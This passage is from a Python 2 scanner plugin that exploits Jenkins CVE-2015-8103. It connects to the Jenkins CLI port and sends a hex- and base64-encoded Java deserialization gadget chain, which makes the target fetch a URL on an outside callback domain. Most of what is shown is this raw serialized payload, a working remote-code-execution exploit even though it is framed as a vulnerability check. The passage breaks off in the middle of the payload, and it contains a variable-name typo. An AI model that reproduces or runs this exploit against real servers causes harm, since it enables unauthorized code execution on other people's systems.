    ``ip`` is accepted for call-site compatibility but is not used:
    the domain is a fixed constant.
    """
    verification_domain = 'devil.dns.yoyostay.top'
    return verification_domain
# @is_port_open
def verify(ip, port=80, name=None, timeout=10, types='ip'):
info = {
"url": "http://{}:{}".format(ip, port),
"severity": "high",
"vuln_name": "jenkins rce cve_2015_8103",
"proof": "YES",
}
try:
if tyeps != 'ip':
return
r = urllib2.urlopen('http://' + ip + ':' + str(port), timeout=timeout)
cli_port = int(r.headers['X-Jenkins-CLI-Port'])
socket.setdefaulttimeout(timeout)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (ip, cli_port)
sock.connect(server_address)
headers = '\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
sock.send(headers)
data = sock.recv(1024)
data = sock.recv(1024)
dd = "aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b78707672000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00154c0004686f737471007e00154c000870726f746f636f6c71007e00154c000372656671007e001578707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00155b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078
7000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb342020000787074000e676574436f6e7374727563746f727571007e001d000000017671007e001d7371007e00177571007e001b00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740026687474703a2f2f3235352e3235352e3235352e3235353a383038382f6164642f72616e646f6d74000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e00177571007e001b0000000074000a6f70656e53747265616d7571007e001d000000007371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e0037"
payloadObj = binascii.a2b_hex(dd)
dnsserver = get_ver_ip(ip)
ramdmum = random_str(6 + 15 - len(dnsserver))
payloadObj = payloadObj.replace('http://255.255.255.255:8088/add/random', 'http://' + ramdmum + '.' + dnsserver +'/jenkins_cve_2015/')
payload_b64 = base64.b64encode(payloadObj)
payload = '\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e' + payload_b64 + '\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x
00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x
72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x
6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x
73\x71\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x34\x73\x71\x00\x
7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x
04\x00\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x
00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\